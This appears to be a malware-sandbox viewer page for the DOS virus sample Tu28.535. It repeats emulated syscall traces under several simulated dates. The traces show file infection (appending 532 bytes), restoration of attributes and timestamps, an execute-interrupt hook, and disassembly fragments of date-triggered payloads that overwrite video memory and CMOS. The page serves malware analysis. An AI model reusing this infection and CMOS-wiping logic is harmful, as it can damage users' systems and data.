Sample viewer

vx.netlux.org/Virus.DOS.Tu28.535

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:22.356938844Z 25 PC: 12e17 | Get default drive
2018-12-17T22:51:22.358508523Z 26 PC: 12e34 | Set disk transfer address
2018-12-17T22:51:22.359697194Z 78 PC: 12e47 | Find first file
2018-12-17T22:51:22.367016225Z 67 PC: 12f37 | Get or set file attributes
2018-12-17T22:51:22.385250928Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-17T22:51:22.392500691Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:51:22.399329654Z 66 PC: 12f5e | Move file pointer
2018-12-17T22:51:22.400901529Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:51:22.403793161Z 66 PC: 12f73 | Move file pointer
2018-12-17T22:51:22.405059634Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-17T22:51:22.413498929Z 66 PC: 12f88 | Move file pointer
2018-12-17T22:51:22.415033714Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:51:22.417656951Z 67 PC: 12f9f | Get or set file attributes
2018-12-17T22:51:22.42866288Z 87 PC: 12fa4 | Get or set file date and time
2018-12-17T22:51:22.431304886Z 87 PC: 12fae | Get or set file date and time
2018-12-17T22:51:22.433875282Z 62 PC: 12fb2 | Close file
2018-12-17T22:51:22.489565028Z 42 PC: 12fc7 | Get date 0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-17T22:51:22.493035475Z 250 PC: 12c21 | UNKNOWN!
2018-12-17T22:51:22.493906914Z 144 PC: 12c2c | UNKNOWN!
2018-12-17T22:51:22.494732731Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:51:22.496128184Z 74 PC: 12c5a | Reallocate memory
2018-12-17T22:51:22.497806813Z 72 PC: 12c61 | Allocate memory
2018-12-17T22:51:22.49945523Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:51:22.500691098Z 42 PC: 12a6a | Get date 0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:16.844314433Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:16.846485074Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:16.849043952Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:16.856338674Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:16.873766351Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:16.882283079Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:16.892478485Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:16.894532786Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:16.899438375Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:16.902488904Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:16.91436269Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:16.916855243Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:16.919818902Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:16.933408636Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:16.935415157Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:16.937892885Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:16.948173875Z 42 PC: 12fc7 | Get date 0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:16.951026795Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:16.952793054Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:16.953737743Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:16.955128182Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:16.957102587Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:16.959482529Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:16.961205334Z 42 PC: 12a6a | Get date 0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":28,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:16.856846463Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:16.858527088Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:16.859761209Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:16.866558369Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:16.88830564Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:16.89610052Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:16.903792472Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:16.905523837Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:16.912680864Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:16.914545336Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:16.923697886Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:16.926979837Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:16.930215933Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:16.942507112Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:16.944643301Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:16.94666204Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:16.955280666Z 42 PC: 12fc7 | Get date 0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:16.980207439Z 44 PC: 12fd1 | Get time 0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
0x12ff3: mov cx, 0x11
0x12ff6: mov bx, es
0x12ff8: add bx, 0x1ff
0x12ffc: push bx
2018-12-25T12:28:16.982771825Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:16.984138524Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:16.9855603Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:16.986771696Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:16.988132153Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:16.989918939Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:16.991201341Z 42 PC: 12a6a | Get date 0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":18,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:17.419531666Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:17.421214842Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:17.423510432Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:17.438140869Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:17.455507175Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:17.47411322Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:17.481782993Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:17.483829862Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.488698879Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:17.492566554Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:17.501901112Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:17.505951861Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.509922584Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:17.523384672Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:17.525301375Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:17.528605833Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:17.537681698Z 42 PC: 12fc7 | Get date 0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:17.544412797Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:17.546662012Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:17.547635374Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.549033521Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:17.552042978Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:17.553942954Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.556396905Z 42 PC: 12a6a | Get date 0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:17.670993976Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:17.672886459Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:17.675297621Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:17.682505704Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:17.699503317Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:17.70863234Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:17.715971622Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:17.717505683Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.721189799Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:17.723760189Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:17.733429052Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:17.735828421Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.740033141Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:17.752408951Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:17.754277921Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:17.757132518Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:17.765542115Z 42 PC: 12fc7 | Get date 0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:17.768496651Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:17.770035389Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:17.770960277Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.77243517Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:17.774845233Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:17.777604525Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.779412217Z 42 PC: 12a6a | Get date 0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:17.878570489Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:17.880407423Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:17.881774532Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:17.888035748Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:17.904319883Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:17.910906371Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:17.917062568Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:17.918746409Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.922000286Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:17.923340189Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:17.931088153Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:17.933498077Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.936070156Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:17.946537687Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:17.948924928Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:17.950362486Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:17.957176931Z 42 PC: 12fc7 | Get date 0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:17.962627514Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:17.96349178Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:17.964349585Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.967981756Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:17.969346495Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:17.97087879Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.972575067Z 42 PC: 12a6a | Get date 0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":18,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:18.196538978Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:18.1981724Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:18.199179208Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:18.202986448Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:18.215969422Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:18.22336922Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:18.227922856Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:18.229825622Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:18.233343229Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:18.235134352Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:18.243461058Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:18.245564267Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:18.248520262Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:18.259136233Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:18.262039904Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:18.263812594Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:18.270809431Z 42 PC: 12fc7 | Get date 0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:18.274215385Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:18.275158393Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:18.275970406Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:18.277737683Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:18.279075949Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:18.280528176Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:18.283160785Z 42 PC: 12a6a | Get date 0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1